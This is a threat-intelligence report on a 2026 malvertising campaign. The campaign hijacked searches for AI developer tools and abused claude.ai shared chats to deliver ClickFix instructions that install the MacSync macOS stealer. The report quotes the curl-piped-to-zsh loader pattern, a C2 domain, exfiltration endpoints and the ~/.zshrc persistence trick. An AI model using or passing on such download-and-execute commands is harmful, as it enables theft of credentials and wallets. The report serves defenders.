Threat Actors Abuse claude.ai Shared Chat Feature for ClickFix Malvertising Campaign Delivering MacSync Stealer — Threadlinqs Intelligence
As of 2026-08-30, Threat Actors Abuse claude.ai Shared Chat Feature for ClickFix Malvertising Campaign Delivering MacSync Stealer is a high-severity malware threat attributed to a Russia-nexus actor, tracked by Threadlinqs Intelligence with 9 detection rules (Splunk SPL, Microsoft KQL, Sigma) and 22 indicators of compromise.
Threat ID: TL-2026-2241 · Severity: HIGH · Status: ACTIVE · Category: MALWARE
Attribution: Russia · FINANCIAL
Between April 8 and June 14, 2026, TrendAI Research tracked a seven-week, six-wave malvertising campaign that hijacked Google Ads searches for AI developer tools (Claude AI, ChatGPT Codex, Perplexity,
TrendAI Research (Trend Micro) documented a sustained Google Ads malvertising operation running April 8 - June 14, 2026 across six attack waves and 106 unique malicious hostnames. The campaign impersonated at least six brands relevant to AI-assisted developers - ChatGPT Codex, Perplexity, Cursor IDE, JetBrains, and Claude AI/claude.ai - by purchasing sponsored search results for queries such as "claude download" and "claude mac," exploiting the fact that technically skilled users are more likely to trust and execute terminal instructions without suspicion.
Waves 1-4 (April 8 - early May 2026) hosted fake installer and "Mac cleanup" landing pages on 92+ GitLab Pages subdomains (e.g. claude-code-app.gitlab.io, chatgpt-codex.gitlab.io). Beginning with Wave 5 (May 6-14), the operators pivoted to abusing claude.ai's legitimate shared-conversation feature: they set the Claude account display name to "Apple Support" (and later a "Corda Team" persona) and published shared chats containing step-by-step ClickFix instructions for opening Terminal and pasting a Base64-encoded command. By Wave 6 (May 21 - June 14) the campaign had abandoned GitLab infrastructure entirely, using 45 to 61+ distinct claude.ai shared-conversation IDs to host the lure - because the payload now resolved from a fully trusted, Safe-Browsing-exempt domain, it evaded the browser and search-engine warnings that would normally flag a freshly registered malicious host.
The ClickFix command decodes to a curl-piped-to-zsh loader (observed pattern: `curl -kfsSL $(echo '<base64>' | base64 -D) | zsh`) that retrieves a Base64+gzip-packed second-stage script from a C2 host (Zscaler's overlapping June 12-19 sub-wave, dubbed "ClaudeFix," used lasvegaslaminateflooring.com among 170+ hosting domains). That script authenticates to a `/dynamic?txd=<token>` endpoint with a hardcoded API key and fetches a fileless AppleScript payload executed via the Apple-signed `osascript` interpreter, leaving minimal disk artifacts. The AppleScript is MacSync, a Malware-as-a-Service macOS infostealer first tracked since November 2025 across prior ClickFix waves that impersonated OpenAI ChatGPT Atlas and abused chatgpt.com shared-conversation links. MacSync enumerates running processes and system information, then harvests Keychain data, Chromium/Firefox browser credentials and cookies, SSH keys, AWS and Kubernetes configuration files, Telegram Desktop data, shell history, and targeted file extensions (.wallet, .key, .seed, .kdbx, .pem), alongside 80-130+ browser-extension cryptocurrency wallets and desktop wallets (Exodus, Electrum, Bitcoin, Monero, Litecoin); later MacSync variants also trojanize the Ledger hardware-wallet application to capture seed phrases. Stolen data is staged under `/tmp/sync<7-digit-random>/`, archived to `/tmp/osalogging.zip`, and exfiltrated via HTTP PUT in 10MB chunks (up to 8 retries) to a `/gate?buildtxd=...&upload_id=...&chunk_index=...&total_chunks=...` endpoint, with wallet-specific data routed through `/ledger/` and `/trezor/` paths. Observed evasion includes Base64/gzip obfuscation, output redirection to /dev/null, a Russian-keyboard-layout check that skips execution on likely CIS-region hosts, and (in related MacSync iterations) abuse of Apple code-signing/notarization to suppress Gatekeeper warnings entirely. Persistence is achieved by appending the download-and-execute command to `~/.zshrc`, re-triggering on each new terminal session.
Victim telemetry skewed heavily toward Asia-Pacific (67.2%), led by Taiwan (30.5%, 772 confirmed interactions), Japan (201) and Singapore (188), with later waves expanding into India, France and Italy. Russian-language comments found in campaign-tracking code, combined with the CIS-region exclusion logic, point toward a Russian-speaking criminal operator running MacSync as a MaaS offering rather than a nation-state actor. Upon notification by TrendAI Research, Anthropic investigated, banned the accounts responsible, disabled th
Target sectors: technology
Target regions: Asia-Pacific, taiwan, japan, singapore, india, france, italy
Timeline
- First documented MacSync ClickFix wave impersonates OpenAI's ChatGPT Atlas browser via Google sponsored search, directing victims to fake Google Sites download pages that prompt Terminal command execution.
- Second MacSync wave abuses legitimate ChatGPT shared-conversation links (chatgpt.com/share/...) to host Mac-maintenance-themed ClickFix instructions, driving 18,000+ clicks in three days before redirecting to GitHub-themed installer pages.
- Third MacSync iteration adopts a Loader-as-a-Service model with in-memory AppleScript payloads, targets U.S. SLTT government macOS users, and expands to Belgium, India, and North/South America; CIS/MS-ISAC disseminates 1,000+ associated IOCs to members.
- TrendAI Research's tracked campaign begins: Google Ads hijack searches for Claude AI, ChatGPT Codex, Perplexity, Cursor IDE, and JetBrains, funneling victims to 92+ malicious GitLab Pages subdomains across Waves 1-4.
- Wave 5 (May 6-14): operators pivot from self-hosted GitLab Pages to abusing claude.ai's legitimate shared-chat feature, setting the Claude account display name to "Apple Support" to host ClickFix terminal instructions on a fully trusted domain.
- Wave 6 (May 21 - June 14): campaign fully abandons GitLab infrastructure; 45 to 61+ unique claude.ai shared-conversation IDs are identified hosting ClickFix payloads, alongside a newly observed "Corda Team" impersonation persona.
- Zscaler documents an overlapping short-lived sub-wave (June 12-19), dubbed "ClaudeFix," using C2 domain lasvegaslaminateflooring.com among 170+ hosting domains and a multi-stage curl-to-zsh-to-AppleScript loader chain.
- Tracked campaign activity window closes; TrendAI Research reports totals of 106 unique malicious hostnames across six waves, 45-60+ abused claude.ai shared-chat instances, and 2,000+ confirmed victims (67.2% APAC, 30.5% Taiwan).
- Trend Micro publishes its technical research; Anthropic confirms it investigated, banned the responsible accounts, disabled the malicious shared conversations, and is implementing additional abuse mitigations for the shared-chat feature.
Detections & IOCs
As of 2026-09-06, this threat has 9 detection rule(s) across Splunk SPL, Microsoft KQL and Sigma, and 22 indicator(s) of compromise. Detection query text and full IOC values are available to authenticated users and programmatically via the Threadlinqs MCP server (Purple tier). View plans.
Community OSINT corroboration
1 of this threat's indicators have also been reported by the open-source security community, which observed at least one of them before this report was published. Community sightings are unverified and are kept separate from Threadlinqs' curated indicators. Indicator values, reporters and campaign linkage are available to authenticated Red-tier users.
MALWARE, HIGH, threat intelligence, cybersecurity, T1583, T1566, T1204, T1059, T1546, T1027, T1140, T1036, T1553, T1497